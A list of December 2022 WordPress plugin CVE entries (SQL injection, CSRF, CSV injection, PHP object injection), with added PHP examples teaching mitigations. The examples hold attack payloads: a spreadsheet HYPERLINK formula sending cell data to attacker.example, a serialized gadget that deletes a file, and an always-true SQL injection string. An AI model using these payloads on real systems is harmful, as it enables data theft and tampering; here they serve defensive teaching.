CVE-2022-46802 – WordPress Product Reviews Import Export for WooCommerce Plugin <= 1.4.8 is vulnerable to CSV Injection
https://notcve.org/view.php?id=CVE-2022-46802
09 Dec 2022 — The Product Reviews Import Export for WooCommerce plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 1.4.8. • https://patchstack.com/database/vulnerability/product-reviews-import-export-for-woocommerce/wordpress-product-reviews-import-export-for-woocommerce-plugin-1-4-8-unauth-csv-injection-vulnerability • CWE-1236: Improper Neutralization of Formula Elements in a CSV File •
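CSV injection (CWE-1236) is not a bug in the CSV format but in what a spreadsheet does with a cell that begins with a formula character once the export is opened. The following is an added example, not code from the plugin above, showing the neutralisation an export routine needs; the review rows, the payload cell and the function names are constructed for the demo.

```php
<?php
// Added example (not the plugin's code): neutralising formula elements
// (CWE-1236) when exporting user-controlled text to CSV.
// All rows, cell values and function names below are constructed.

/**
 * Return $value in a form a spreadsheet treats as text, not a formula.
 * Leading '=', '+', '-', '@', tab and carriage return are the characters
 * Excel/LibreOffice interpret as a formula or cell-reference start; a
 * leading apostrophe forces text mode. Numeric cells are left alone so a
 * negative rating is still a number rather than "'-1".
 */
function neutralize_csv_cell(string $value): string
{
    if (is_numeric($value)) {
        return $value;
    }
    // Look past leading whitespace so "  =cmd..." is not missed.
    $probe = ltrim($value, " \t\r\n");
    if ($probe !== '' && strpos("=+-@\t\r", $probe[0]) !== false) {
        $value = "'" . $value;
    }
    // Tabs and line breaks inside a field can start a new cell in lax
    // importers; flatten them to spaces.
    return str_replace(["\t", "\r", "\n"], ' ', $value);
}

/**
 * Write a header plus review rows to CSV, running every cell through
 * neutralize_csv_cell(). fputcsv() handles quoting and quote-doubling.
 */
function export_reviews_csv(array $rows): string
{
    $fh = fopen('php://temp', 'r+');
    fputcsv($fh, ['reviewer', 'rating', 'comment']);
    foreach ($rows as $row) {
        fputcsv($fh, array_map(
            static fn($cell) => neutralize_csv_cell((string) $cell),
            $row
        ));
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed sample: two honest reviews and one whose comment field is a
// formula that would phone home (with the neighbouring cell's content)
// when the export is opened in a spreadsheet.
$reviews = [
    ['alice',   5,  'Works great'],
    ['mallory', -1, '=HYPERLINK("https://attacker.example/?" & A2, "see review")'],
    ['bob',     4,  '@SUM(1+1)'],
];

echo export_reviews_csv($reviews);
```

The apostrophe prefix is the widely used mitigation, but it is visible to users who open the file in a plain text editor and it is not reversible on re-import. For an import/export plugin the cleaner option is to neutralise on export only and to validate on import that fields that should be numeric or enumerated actually are, rather than round-tripping free text through a spreadsheet.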
CVE-2022-4049 – WP User <= 7.0 - Unauthenticated SQLi
https://notcve.org/view.php?id=CVE-2022-4049
09 Dec 2022 — The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. The WP User plugin for WordPress is vulnerable to SQL Injection in versions up t... • https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVE-2022-4059 – Cryptocurrency Widgets Pack < 2.0 - Unauthenticated SQLi
https://notcve.org/view.php?id=CVE-2022-4059
09 Dec 2022 — The Cryptocurrency Widgets Pack WordPress plugin before 2.0 does not sanitise and escape some parameters before using them in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. The Cryptocurrency Wi... • https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVE-2022-4099 – Joy Of Text Lite < 2.3.1 - Unauthenticated SQLi
https://notcve.org/view.php?id=CVE-2022-4099
08 Dec 2022 — The Joy Of Text Lite WordPress plugin before 2.3.1 does not properly sanitise and escape some parameters before using them in SQL statements accessible to unauthenticated users, leading to unauthenticated SQL injection. The Joy Of Text Lite plugin for <... • https://wpscan.com/vulnerability/a282dd39-926d-406b-b8f5-e4c6e0c2c028 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVE-2022-3241 – Build App Online < 1.0.19 - Unauthenticated SQL Injection
https://notcve.org/view.php?id=CVE-2022-3241
06 Dec 2022 — The Build App Online WordPress plugin before 1.0.19 does not properly sanitise and escape some parameters before using them in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. The Buil... • https://wpscan.com/vulnerability/a995dd67-43fc-4087-a7f1-5db57f4c828c • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVE-2022-45079 – WordPress Loginizer Plugin <= 1.7.5 is vulnerable to Cross Site Request Forgery (CSRF)
https://notcve.org/view.php?id=CVE-2022-45079
05 Dec 2022 — The Loginizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.5. • https://patchstack.com/database/vulnerability/loginizer/wordpress-loginizer-plugin-1-7-5-cross-site-request-forgery-csrf-vulnerability • CWE-352: Cross-Site Request Forgery (CSRF) •
CVE-2022-4120 – Stop Spammers Security < 2022.6 - Unauthenticated PHP Object Injection
https://notcve.org/view.php?id=CVE-2022-4120
05 Dec 2022 — The Stop Spammers Security | Block Spam Users, Comments, Forms WordPress plugin before 2022.6 passes base64-encoded user input to the unserialize() PHP function when a CAPTCHA is used as the second challenge, which could lead to PHP Object Injection if a plugin installed on the blog provides a suitable gadget chain. • https://wpscan.com/vulnerability/e8bb79db-ef77-43be-b449-4c4b5310eedf • CWE-502: Deserialization of Untrusted Data •
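The phrase "if a plugin installed on the blog has a suitable gadget chain" is the whole point of CWE-502 in PHP: unserialize() instantiates whatever class the attacker names, and any __wakeup()/__destruct() on that class runs with the attacker's property values. The following is an added example, not the plugin's code: the TempFile class stands in for a gadget some other installed plugin might provide, and the payload, file and function names are constructed for the demo. It needs only stock PHP.

```php
<?php
// Added example (not the plugin's code): why unserialize() on user input is
// dangerous (CWE-502) and what to use instead. TempFile is a stand-in
// "gadget"; the payload and function names are constructed for the demo.

// A harmless-looking helper that removes its file when it goes away. If an
// attacker can instantiate it with an arbitrary path, the destructor becomes
// an arbitrary-file-delete primitive.
class TempFile
{
    public string $path = '';

    public function __destruct()
    {
        if ($this->path !== '' && is_file($this->path)) {
            unlink($this->path);
        }
    }
}

// Vulnerable pattern: base64 from the request goes straight into unserialize().
function restore_challenge_state_unsafe(string $encoded)
{
    return unserialize(base64_decode($encoded));
}

// Hardened: refuse to instantiate any class. Serialized objects come back as
// __PHP_Incomplete_Class, whose magic methods never run.
function restore_challenge_state_safe(string $encoded)
{
    $raw = base64_decode($encoded, true);   // strict: reject junk input
    if ($raw === false) {
        return null;
    }
    return unserialize($raw, ['allowed_classes' => false]);
}

// Better for state the plugin owns itself: JSON carries no object types.
function restore_challenge_state_json(string $encoded): ?array
{
    $raw  = base64_decode($encoded, true);
    $data = $raw === false ? null : json_decode($raw, true);
    return is_array($data) ? $data : null;
}

// Demo: build the payload the way an attacker would, pointing the gadget at
// a file they want removed (here a scratch file, so nothing real is lost).
$victim = tempnam(sys_get_temp_dir(), 'gadget');
$gadget = new TempFile();
$gadget->path = $victim;
$payload = base64_encode(serialize($gadget));
$gadget->path = '';   // keep our local object from deleting the file itself

// Hardened path: object is incomplete, destructor does not run, file stays.
$obj = restore_challenge_state_safe($payload);
printf("safe: got %s, file still present: %s\n",
    get_class($obj), var_export(file_exists($victim), true));
unset($obj);

// JSON path: a serialized-object payload is simply not valid JSON.
printf("json: %s\n", var_export(restore_challenge_state_json($payload), true));

// Vulnerable path: real TempFile is built, destructor fires on unset.
$obj = restore_challenge_state_unsafe($payload);
unset($obj);
printf("unsafe: file still present: %s\n", var_export(file_exists($victim), true));

@unlink($victim);
```

allowed_classes => false (or an explicit whitelist) closes the object-injection vector but still lets an attacker feed arbitrary arrays and strings into whatever consumes the result, so the decoded value still needs the same validation as any other request parameter. Where the data only ever needs scalars and arrays, json_decode() with an associative result removes the class of bug entirely.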
CVE-2022-25912 – Remote Code Execution (RCE)
https://notcve.org/view.php?id=CVE-2022-25912
05 Dec 2022 — WordPress plugins and themes may use this npm package (the git-js/simple-git library at the reference below), but doing so does not by itself make them vulnerable to exploitation. • https://github.com/steveukx/git-js/blob/main/docs/PLUGIN-UNSAFE-ACTIONS.md#overriding-allowed-protocols • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') • CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVE-2022-45807 – WordPress WP Mail Log Plugin <= 1.0.1 is vulnerable to Cross Site Request Forgery (CSRF)
https://notcve.org/view.php?id=CVE-2022-45807
02 Dec 2022 — The WP Mail Log plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. • https://patchstack.com/database/vulnerability/wp-mail-log/wordpress-wp-mail-log-plugin-1-0-1-cross-site-request-forgery-csrf-vulnerability • CWE-352: Cross-Site Request Forgery (CSRF) •
CVE-2022-45822 – WordPress Advanced Booking Calendar Plugin <= 1.7.1 is vulnerable to SQL Injection
https://notcve.org/view.php?id=CVE-2022-45822
02 Dec 2022 — SQL Injection (SQLi) vulnerability in Advanced Booking Calendar plugin <= 1.7.1 on WordPress. The Advanced Booking Calendar for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.7.1 due to insufficient escaping on the user supplied parameter and lack... • https://patchstack.com/database/vulnerability/advanced-booking-calendar/wordpress-advanced-booking-calendar-plugin-1-7-1-unauth-sql-injection-sqli-vulnerability • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
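Five of the entries above (WP User, Cryptocurrency Widgets Pack, Joy Of Text Lite, Build App Online and Advanced Booking Calendar) describe the same shape of bug: a request parameter, often reached through an AJAX action registered for unauthenticated users, is concatenated into a SQL statement. The following is an added example and not any of those plugins' code; it uses an in-memory SQLite database through PDO so it runs stand-alone (the pdo_sqlite extension is assumed), and the table, rows, attacker value and function names are constructed for the demo. In a WordPress plugin the equivalent fix is $wpdb->prepare() with %d/%s placeholders.

```php
<?php
// Added example (not any listed plugin's code): the AJAX-parameter-to-SQL
// pattern behind the CWE-89 entries, shown with PDO + in-memory SQLite so it
// runs stand-alone. Table, rows, attacker value and names are constructed.

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE messages (id INTEGER PRIMARY KEY, owner TEXT, body TEXT)');
    $db->exec("INSERT INTO messages VALUES (1, 'alice', 'hello'), (2, 'bob', 'secret')");
    return $db;
}

// Vulnerable: the request value is interpolated into the statement. Hooked
// to wp_ajax_nopriv_<action> this is reachable by anyone, no login needed,
// and sanitize_text_field() would NOT help: quotes survive it.
function fetch_messages_unsafe(PDO $db, string $owner): array
{
    $sql = "SELECT body FROM messages WHERE owner = '" . $owner . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: bind the value so it can never become part of the SQL grammar.
// WordPress equivalent:
//   $wpdb->get_col($wpdb->prepare("SELECT body FROM {$table} WHERE owner = %s", $owner));
function fetch_messages_safe(PDO $db, string $owner): array
{
    $stmt = $db->prepare('SELECT body FROM messages WHERE owner = ?');
    $stmt->execute([$owner]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed attacker value: closes the string literal and appends an
// always-true condition, turning a per-owner lookup into a full table dump.
$attacker = "alice' OR '1'='1";

$db = make_db();

echo "unsafe (payload rewrites the WHERE clause):\n";
print_r(fetch_messages_unsafe($db, $attacker));

echo "safe (payload is matched literally as an owner name):\n";
print_r(fetch_messages_safe($db, $attacker));
```

Two practitioner notes. First, prepare() protects values, not identifiers: a column or table name taken from the request still has to be checked against an allow-list. Second, the "unauthenticated AJAX action" part of these advisories is its own fix: hooks registered with wp_ajax_nopriv_ should exist only for functionality that genuinely needs to be public, and everything else belongs behind a capability check plus check_ajax_referer().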